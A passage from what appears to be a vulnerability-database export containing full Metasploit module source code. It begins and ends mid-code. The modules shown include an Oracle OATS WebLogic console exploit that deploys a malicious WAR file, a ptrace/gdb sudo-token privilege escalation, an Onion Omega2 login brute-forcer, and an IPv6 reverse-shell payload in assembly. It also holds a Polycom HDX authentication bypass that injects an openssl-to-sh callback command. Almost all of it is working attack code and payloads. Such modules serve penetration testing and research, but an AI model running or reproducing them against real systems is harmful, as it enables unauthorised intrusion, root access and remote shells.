end\n\n class OatsWarPayload < MetasploitModule\n attr_reader :name\n attr_reader :war\n\n def initialize(payload)\n @name = [Faker::App.name, Rex::Text.rand_name].sample\n @war = payload.encoded_war(app_name: name).to_s\n end\n end\n\n def default_oats_path\n datastore['DefaultOatsPath']\n end\n\n def war_payload\n @war_payload ||= OatsWarPayload.new(payload)\n end\n\n def set_frsc\n value = get_deploy_frsc\n @frsc = value\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')\n })\n\n if res && res.body.include?('Oracle WebLogic Server Administration Console')\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def set_admin_console_session(res)\n cookie = res.get_cookies\n admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first\n vprint_status(\"Token for console session is: #{admin_console_session}\")\n login_spec.admin_console_session = admin_console_session\n end\n\n def is_logged_in?(res)\n html = res.get_html_document\n a_element = html.at('a')\n if a_element.respond_to?(:attributes) && a_element.attributes['href']\n link = a_element.attributes['href'].value\n return URI(link).request_uri == '/console'\n end\n\n false\n end\n\n def do_login\n uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n fail_with(Failure::Unknown, 'No response from server') unless res\n set_admin_console_session(res)\n\n uri = normalize_uri(target_uri.path, 'console', 'j_security_check')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_post' =>\n {\n 'j_username' => datastore['OATSUSERNAME'],\n 'j_password' => datastore['OATSPASSWORD'],\n 'j_character_encoding' => 'UTF-8'\n }\n })\n\n fail_with(Failure::Unknown, 'No response while trying to log in') unless res\n fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)\n store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])\n set_admin_console_session(res)\n end\n\n def get_deploy_frsc\n # First we are just going through the pages in a specific order to get the FRSC value\n # we need to prepare uploading the WAR file.\n res = nil\n requests =\n [\n { path: 'console/', vars: {} },\n { path: 'console/console.portal', vars: {'_nfpb'=>\"true\"} },\n { path: 'console/console.portal', vars: {'_nfpb'=>\"true\", '_pageLabel' => 'HomePage1'} }\n ]\n\n requests.each do |req|\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, req[:path]),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' => req[:vars]\n })\n\n fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res\n end\n\n html = res.get_html_document\n hidden_input = html.at('input[@name=\"ChangeManagerPortletfrsc\"]')\n frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil\n frsc_attr ? frsc_attr.value : ''\n end\n\n def do_select_upload_action\n action = '/com/bea/console/actions/app/install/selectUploadApp'\n app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\\\servers\\\\AdminServer\\\\upload')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletselectedAppPath' => app_path,\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n end\n\n def do_upload_app_action\n action = '/com/bea/console/actions/app/install/uploadApp'\n ctype = 'application/octet-stream'\n app_cname = 'AppApplicationInstallPortletuploadAppPath'\n plan_cname = 'AppApplicationInstallPortletuploadPlanPath'\n frsc_cname = 'AppApplicationInstallPortletfrsc'\n war = war_payload.war\n war_name = war_payload.name\n post_data = Rex::MIME::Message.new\n post_data.add_part(war, ctype, 'binary', \"form-data; name=\\\"#{app_cname}\\\"; filename=\\\"#{war_name}.war\\\"\")\n post_data.add_part('', ctype, nil, \"form-data; name=\\\"#{plan_cname}\\\"; filename=\\\"\\\"\")\n post_data.add_part(frsc, nil, nil, \"form-data; name=\\\"#{frsc_cname}\\\"\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n end\n\n def do_app_select_action\n action = '/com/bea/console/actions/app/install/appSelected'\n war_name = war_payload.name\n app_path = Rex::FileUtils.normalize_win_path(default_oats_path, \"oats\\\\servers\\\\AdminServer\\\\upload\\\\#{war_name}.war\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletselectedAppPath' => app_path,\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n end\n\n def do_style_select_action\n action = '/com/bea/console/actions/app/install/targetStyleSelected'\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortlettargetStyle' => 'Application',\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n end\n\n def do_finish_action\n action = '/com/bea/console/actions/app/install/finish'\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletname' => war_payload.name,\n 'AppApplicationInstallPortletsecurityModel' => 'DDOnly',\n 'AppApplicationInstallPortletstagingStyle' => 'Default',\n 'AppApplicationInstallPortletplanStagingStyle' => 'Default',\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n\n # 302 is a good enough indicator of a successful upload, otherwise\n # the server would actually return a 200 with an error message.\n res.code == 302\n end\n\n def print_response_message(res)\n html = res.get_html_document\n message_div = html.at('div[@class=\"message\"]')\n if message_div\n msg = message_div.at('span').text\n print_status(\"Server replies: #{msg.inspect}\")\n end\n end\n\n def deploy_war\n set_frsc\n print_status(\"FRSC value: #{frsc}\")\n do_select_upload_action\n do_upload_app_action\n do_app_select_action\n do_style_select_action\n do_finish_action\n end\n\n def goto_war(name)\n print_good(\"Operation \\\"#{name}\\\" is a go!\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, name)\n })\n\n print_status(\"Code #{res.code} on \\\"#{name}\\\" request\") if res\n end\n\n def undeploy_war\n war_name = war_payload.name\n handle = 'com.bea.console.handles.JMXHandle(\"com.bea:Name=oats,Type=Domain\")'\n contents = %Q|com.bea.console.handles.AppDeploymentHandle(\"com.bea:Name=#{war_name},Type=AppDeployment\")|\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',\n 'AppDeploymentsControlPortlethandle' => handle\n },\n 'vars_post' =>\n {\n # For some reason, the value given to the server is escapped twice.\n # The Metasploit API should do it at least once.\n 'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),\n '_pageLabel' => 'AppApplicationUninstallPage',\n '_nfpb' => 'true',\n 'AppApplicationUninstallPortletfrsc' => frsc\n }\n })\n\n if res && res.code == 302\n print_good(\"Successfully undeployed #{war_name}.war\")\n else\n print_warning(\"Unable to successfully undeploy #{war_name}.war\")\n print_warning('You may want to do so manually.')\n end\n end\n\n def cleanup\n undeploy_war if is_cleanup_ready\n super\n end\n\n def setup\n @is_cleanup_ready = false\n super\n end\n\n def exploit\n unless check == Exploit::CheckCode::Detected\n print_status('Target does not have the login page we are looking for.')\n return\n end\n\n do_login\n print_good(\"Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}\")\n print_status(\"Ready for war. Codename \\\"#{war_payload.name}\\\" at #{war_payload.war.length} bytes\")\n result = deploy_war\n if result\n @is_cleanup_ready = true\n goto_war(war_payload.name)\n end\n end\n\n attr_reader :frsc\n attr_reader :is_cleanup_ready\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/oats_weblogic_console.rb"}, {"lastseen": "2019-11-28T14:45:19", "bulletinFamily": "exploit", "description": "This module attempts to gain root privileges by blindly injecting into the session user's running shell processes and executing commands by calling `system()`, in the hope that the process has valid cached sudo tokens with root privileges. The system must have gdb installed and permit ptrace. This module has been tested successfully on: Debian 9.8 (x64); and CentOS 7.4.1708 (x64).\n", "modified": "2019-08-10T07:03:23", "published": "2019-04-30T21:54:18", "id": "MSF:EXPLOIT/LINUX/LOCAL/PTRACE_SUDO_TOKEN_PRIV_ESC", "href": "", "type": "metasploit", "title": "ptrace Sudo Token Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Kernel\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ptrace Sudo Token Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges by blindly injecting into\n the session user's running shell processes and executing commands by\n calling `system()`, in the hope that the process has valid cached sudo\n tokens with root privileges.\n\n The system must have gdb installed and permit ptrace.\n\n This module has been tested successfully on:\n\n Debian 9.8 (x64); and\n CentOS 7.4.1708 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'chaignc', # sudo_inject\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2019-03-24',\n 'References' =>\n [\n ['EDB', '46989'],\n ['URL', 'https://github.com/nongiach/sudo_inject'],\n ['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'],\n ['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'],\n ['URL', 'https://lwn.net/Articles/393012/'],\n ['URL', 'https://lwn.net/Articles/492667/'],\n ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'],\n ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']\n ],\n 'Platform' => ['linux'],\n 'Arch' =>\n [\n ARCH_X86,\n ARCH_X64,\n ARCH_ARMLE,\n ARCH_AARCH64,\n ARCH_PPC,\n ARCH_MIPSLE,\n ARCH_MIPSBE\n ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'DefaultOptions' =>\n {\n 'PrependSetresuid' => true,\n 'PrependSetresgid' => true,\n 'PrependFork' => true,\n 'WfsDelay' => 30\n },\n 'DefaultTarget' => 0))\n register_options [\n OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def timeout\n datastore['TIMEOUT']\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def check\n if yama_enabled?\n vprint_error 'YAMA ptrace scope is restrictive'\n return CheckCode::Safe\n end\n vprint_good 'YAMA ptrace scope is not restrictive'\n\n if command_exists? '/usr/sbin/getsebool'\n if cmd_exec(\"/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on && echo true\").to_s.include? 'true'\n vprint_error 'SELinux deny_ptrace is enabled'\n return CheckCode::Safe\n end\n vprint_good 'SELinux deny_ptrace is disabled'\n end\n\n unless command_exists? 'sudo'\n vprint_error 'sudo is not installed'\n return CheckCode::Safe\n end\n vprint_good 'sudo is installed'\n\n unless command_exists? 'gdb'\n vprint_error 'gdb is not installed'\n return CheckCode::Safe\n end\n vprint_good 'gdb is installed'\n\n CheckCode::Detected\n end\n\n def exploit\n unless check == CheckCode::Detected\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n if nosuid? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is mounted nosuid\"\n end\n\n # Find running shell processes\n shells = %w[ash ksh csh dash bash zsh tcsh fish sh]\n\n system_shells = read_file('/etc/shells').to_s.each_line.map {|line|\n line.strip\n }.reject {|line|\n line.starts_with?('#')\n }.each {|line|\n shells << line.split('/').last\n }\n shells = shells.uniq.reject {|shell| shell.blank?}\n\n print_status 'Searching for shell processes ...'\n pids = []\n if command_exists? 'pgrep'\n cmd_exec(\"pgrep '^(#{shells.join('|')})$' -u \\\"$(id -u)\\\"\").to_s.each_line do |pid|\n pids << pid.strip\n end\n else\n shells.each do |s|\n pidof(s).each {|p| pids << p.strip}\n end\n end\n\n if pids.empty?\n fail_with Failure::Unknown, 'Found no running shell processes'\n end\n\n print_status \"Found #{pids.uniq.length} running shell processes\"\n vprint_status pids.join(', ')\n\n # Upload payload\n @payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 10..15}\"\n upload @payload_path, generate_payload_exe\n\n # Blindly call system() in each shell process\n pids.each do |pid|\n print_status \"Injecting into process #{pid} ...\"\n\n cmds = \"echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod 4755 #{@payload_path} >/dev/null 2>&1\"\n sudo_inject = \"echo 'call system(\\\"#{cmds}\\\")' | gdb -q -n -p #{pid} >/dev/null 2>&1\"\n res = cmd_exec sudo_inject, nil, timeout\n vprint_line res unless res.blank?\n\n next unless setuid? @payload_path\n\n print_good \"#{@payload_path} setuid root successfully\"\n print_status 'Executing payload...'\n res = cmd_exec \"#{@payload_path} & echo \"\n vprint_line res\n return\n end\n\n fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.'\n end\n\n def on_new_session(session)\n if session.type.eql? 'meterpreter'\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\n session.fs.file.rm @payload_path\n else\n session.shell_command_token \"rm -f '#{@payload_path}'\"\n end\n ensure\n super\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/ptrace_sudo_token_priv_esc.rb"}, {"lastseen": "2019-12-04T20:29:54", "bulletinFamily": "exploit", "description": "OnionOS login scanner module for Onion Omega2 devices.\n", "modified": "2019-04-25T17:43:55", "published": "2019-03-30T14:37:05", "id": "MSF:AUXILIARY/SCANNER/HTTP/ONION_OMEGA2_LOGIN", "href": "", "type": "metasploit", "title": "Onion Omega2 Login Brute-Force", "sourceData": "#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n# 2019-03-27 05-55\n\n# Standard Modules\nfrom metasploit import module, login_scanner\nimport json\n\n# Extra Modules\ndependencies_missing = False\ntry:\n import requests\nexcept ImportError:\n dependencies_missing = True\n\n# Metasploit Metadata\nmetadata = {\n 'name': 'Onion Omega2 Login Brute-Force',\n 'description': '''\n OnionOS login scanner module for Onion Omega2 devices.\n ''',\n 'authors': [\n 'Not So Attractive <github.com/nsa>'\n ],\n 'date': '2019-03-27',\n 'license': 'MSF_LICENSE',\n 'references': [\n ],\n 'type': 'single_host_login_scanner',\n 'options': {\n 'rhost': {'type': 'address', 'description': 'Host to target', 'required': True},\n 'rport': {'type': 'port', 'description': 'Port to target', 'required': True, 'default': '80'},\n 'userpass': {'type': 'string', 'description': 'A list of username/password combinations to try',\n 'required': False},\n 'sleep_interval': {'type': 'float', 'description': 'Time in seconds to wait between login attempts',\n 'required': False}\n },\n 'service_name': 'Onion Omega2 HTTPd Ubus',\n}\n\n\ndef valid_login(host, rport, username, password):\n payload = {\n \"jsonrpc\": \"2.0\", \"id\": 0, \"method\": \"call\", \"params\": [\"0\" * 32, \"session\", \"login\",\n {\n \"username\": username,\n \"password\": password\n }]}\n url = 'http://' + str(host) + ':' + str(rport) + '/ubus'\n session = requests.Session()\n try:\n request = session.post(url, json=payload)\n response = json.loads(request.text)\n if response['result'][0] != 6 and len(response['result']) > 1:\n ubus_rpc_session = response['result'][1]['ubus_rpc_session']\n module.log('Ubus RPC Session: ' + ubus_rpc_session, level='good')\n else:\n return False\n except requests.exceptions.ConnectionError:\n module.log(\"Unhandled exception: ConnectionError\", level='error')\n return False\n except ValueError:\n module.log(\"Unhandled exception: Response JSON DecodeError\", level='error')\n return False\n except KeyError:\n module.log(\"Unhandled exception: Dictionary KerError in Response\", level='error')\n return False\n else:\n return True\n\n\ndef run(args):\n if dependencies_missing:\n module.log('Python requests module missing, cannot continue', level='error')\n return\n scanner = login_scanner.make_scanner(\n lambda host, rport, username, password: valid_login(host, rport, username, password))\n scanner(args)\n\n\nif __name__ == '__main__':\n module.run(metadata, run)\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/onion_omega2_login.py"}, {"lastseen": "2019-11-27T21:30:23", "bulletinFamily": "exploit", "description": "Connect back to attacker and spawn a command shell over IPv6\n", "modified": "2018-12-07T02:18:21", "published": "2018-11-29T03:58:12", "id": "MSF:PAYLOAD/LINUX/X64/SHELL_REVERSE_IPV6_TCP", "href": "", "type": "metasploit", "title": "Linux x64 Command Shell, Reverse TCP Inline (IPv6)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 90\n\n include Msf::Payload::Single\n include Msf::Payload::Linux\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Linux x64 Command Shell, Reverse TCP Inline (IPv6)',\n 'Description' => 'Connect back to attacker and spawn a command shell over IPv6',\n 'Author' => 'epi <epibar052[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShellUnix,\n ))\n register_options([\n OptInt.new('SCOPEID', [false, \"IPv6 scope ID, for link-local addresses\", 0])\n ])\n end\n\n def convert_input(value, padding, reverse=false)\n # converts value to comma separated string of\n # zero-padded bytes to be used in the db instruction\n arr = value.to_s(16).rjust(padding, \"0\").scan(/../)\n\n if reverse\n arr = arr.reverse\n end\n\n arr.map{ |x| sprintf(\"0x%02x\", x.hex) }.join(',')\n end\n\n def generate_stage\n # 22 -> \"0x00,0x16\"\n # 4444 -> \"0x11,0x5c\"\n tcp_port = convert_input(datastore['LPORT'], 4)\n\n # 0 -> \"0x00,0x00,0x00,0x00\"\n scope_id = convert_input(datastore['SCOPEID'], 8, true)\n\n # ::1 -> \"0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01\"\n # dead:beef:2::1009 -> \"0xde,0xad,0xbe,0xef,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x09\"\n ipv6_addr = convert_input(IPAddr.new(datastore['LHOST'], Socket::AF_INET6).to_i, 32)\n\n payload = <<-EOS\n socket_call:\n ; int socket(int domain, int type, int protocol)\n\n push 0x29\n pop rax ; socket syscall\n push 0xa\n pop rdi ; AF_INET6\n push 0x1\n pop rsi ; SOCK_STREAM\n xor edx,edx ; auto-select protocol \n syscall\n\n push rax\n pop rdi ; store socket fd \n jmp get_address ; jmp-call-pop\n\n populate_sockaddr_in6:\n ; struct sockaddr_in6 {\n ; sa_family_t sin6_family; /* AF_INET6 */\n ; in_port_t sin6_port; /* port number */\n ; uint32_t sin6_flowinfo; /* IPv6 flow information */\n ; struct in6_addr sin6_addr; /* IPv6 address */\n ; uint32_t sin6_scope_id; /* Scope ID (new in 2.4) */\n ; };\n\n ; struct in6_addr {\n ; unsigned char s6_addr[16]; /* IPv6 address */\n ; };\n\n pop rsi ; store pointer to struct\n\n connect_call:\n ; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\n ; rdi -> already contains server socket fd\n ; rsi -> already contains pointer to sockaddr_in6 struct \n push 0x2a\n pop rax ; connect syscall \n push 0x1c\n pop rdx ; length of sockaddr_in6 (28)\n syscall\n\n dup2_calls:\n ; int dup2(int oldfd, int newfd);\n ; rdi -> already contains server socket fd\n push 0x3\n pop rsi ; newfd \n\n dup2_loop:\n ; 2 -> 1 -> 0 (3 iterations)\n push 0x21\n pop rax ; dup2 syscall\n dec esi\n syscall\n loopnz dup2_loop\n\n exec_call:\n ; int execve(const char *filename, char *const argv[], char *const envp[]);\n push 0x3b\n pop rax ; execve call\n cdq ; zero-out rdx via sign-extension\n mov rbx, '/bin/sh'\n push rbx\n push rsp\n pop rdi ; address of /bin/sh\n syscall\n\n get_address:\n call populate_sockaddr_in6\n ; sin6_family(2), sin6_port(2), sin6_flowinfo(4), sockaddr_in6(16), sin6_scope_id(4)\n db 0x0a,0x00,#{tcp_port},0x00,0x00,0x00,0x00,#{ipv6_addr},#{scope_id}\n EOS\n\n Metasm::Shellcode.assemble(Metasm::X86_64.new, payload).encode_string\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb"}, {"lastseen": "2019-10-23T16:10:41", "bulletinFamily": "exploit", "description": "The login component of the Polycom Command Shell on Polycom HDX video endpoints, running software versions 3.0.5 and earlier, is vulnerable to an authorization bypass when simultaneous connections are made to the service, allowing remote network attackers to gain access to a sandboxed telnet prompt without authentication. Versions prior to 3.0.4 contain OS command injection in the ping command which can be used to execute arbitrary commands as root.\n", "modified": "2018-11-04T06:14:26", "published": "2018-11-04T06:14:26", "id": "MSF:EXPLOIT/UNIX/MISC/POLYCOM_HDX_AUTH_BYPASS", "href": "", "type": "metasploit", "title": "Polycom Command Shell Authorization Bypass", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Polycom Command Shell Authorization Bypass',\n 'Alias' => 'polycom_hdx_auth_bypass',\n 'Author' =>\n [\n 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module\n 'h00die <mike@shorebreaksecurity.com>', # submission/cleanup\n ],\n 'DisclosureDate' => 'Jan 18 2013',\n 'Description' => %q(\n The login component of the Polycom Command Shell on Polycom HDX\n video endpoints, running software versions 3.0.5 and earlier,\n is vulnerable to an authorization bypass when simultaneous\n connections are made to the service, allowing remote network\n attackers to gain access to a sandboxed telnet prompt without\n authentication. Versions prior to 3.0.4 contain OS command\n injection in the ping command which can be used to execute\n arbitrary commands as root.\n ),\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],\n [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],\n [ 'EDB', '24494']\n ],\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Targets' => [ [ \"Universal\", {} ] ],\n 'Payload' =>\n {\n 'Space' => 8000,\n 'DisableNops' => true,\n 'Compat' => { 'PayloadType' => 'cmd' }\n },\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [\n Opt::RHOST(),\n Opt::RPORT(23),\n OptAddress.new('CBHOST', [ false, \"The listener address used for staging the final payload\" ]),\n OptPort.new('CBPORT', [ false, \"The listener port used for staging the final payload\" ])\n ], self.class\n )\n register_advanced_options(\n [\n OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),\n OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])\n ], self.class\n )\n end\n\n def check\n connect\n sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + \"\\n\")\n Rex.sleep(1)\n res = sock.get_once\n disconnect\n\n if !res && !res.empty?\n return Exploit::CheckCode::Safe\n end\n\n if res =~ /Welcome to ViewStation/\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n # Keep track of results (successful connections)\n results = []\n\n # Random string for password\n password = Rex::Text.rand_text_alpha(rand(5) + 1)\n\n # Threaded login checker\n max_threads = datastore['THREADS']\n cur_threads = []\n\n # Try up to 100 times just to be sure\n queue = [*(1..datastore['MAX_CONNECTIONS'])]\n\n print_status(\"Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections \")\n until queue.empty?\n while cur_threads.length < max_threads\n\n # We can stop if we get a valid login\n break unless results.empty?\n\n # keep track of how many attempts we've made\n item = queue.shift\n\n # We can stop if we reach max tries\n break unless item\n\n t = Thread.new(item) do |count|\n sock = connect\n sock.put(password + \"\\n\")\n res = sock.get_once\n\n until res.empty?\n break unless results.empty?\n\n # Post-login Polycom banner means success\n if res =~ /Polycom/\n results << sock\n break\n # bind error indicates bypass is working\n elsif res =~ /bind/\n sock.put(password + \"\\n\")\n # Login error means we need to disconnect\n elsif res =~ /failed/\n break\n # To many connections means we need to disconnect\n elsif res =~ /Error/\n break\n end\n res = sock.get_once\n end\n end\n\n cur_threads << t\n end\n\n # We can stop if we get a valid login\n break unless results.empty?\n\n # Add to a list of dead threads if we're finished\n cur_threads.each_index do |ti|\n t = cur_threads[ti]\n unless t.alive?\n cur_threads[ti] = nil\n end\n end\n\n # Remove any dead threads from the set\n cur_threads.delete(nil)\n\n Rex.sleep(0.25)\n end\n\n # Clean up any remaining threads\n cur_threads.each { |sock| sock.kill }\n\n if !results.empty?\n print_good(\"#{rhost}:#{rport} Successfully exploited the authentication bypass flaw\")\n do_payload(results[0])\n else\n print_error(\"#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable\")\n end\n end\n\n def do_payload(sock)\n # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise\n cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])\n\n # Start a listener\n start_listener(true)\n\n # Figure out the port we picked\n cbport = self.service.getsockname[2]\n\n # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128\n cmd = \"\\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\\n\"\n sock.put(cmd)\n\n # Give time for our command to be queued and executed\n 1.upto(5) do\n Rex.sleep(1)\n break if session_created?\n end\n end\n\n def stage_final_payload(cli)\n print_good(\"Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...\")\n cli.put(payload.encoded + \"\\n\")\n end\n\n def start_listener(ssl = false)\n comm = datastore['ListenerComm']\n if comm == 'local'\n comm = ::Rex::Socket::Comm::Local\n else\n comm = nil\n end\n\n self.service = Rex::Socket::TcpServer.create(\n 'LocalPort' => datastore['CBPORT'],\n 'SSL' => ssl,\n 'SSLCert' => datastore['SSLCert'],\n 'Comm' => comm,\n 'Context' =>\n {\n 'Msf' => framework,\n 'MsfExploit' => self\n }\n )\n\n self.service.on_client_connect_proc = proc { |client|\n stage_final_payload(client)\n }\n\n # Start the listening service\n self.service.start\n end\n\n # Shut down any running services\n def cleanup\n super\n if self.service\n print_status(\"Shutting down payload stager listener...\")\n begin\n self.service.deref if self.service.is_a?(Rex::Service)\n if self.service.is_a?(Rex::Socket)\n self.service.close\n 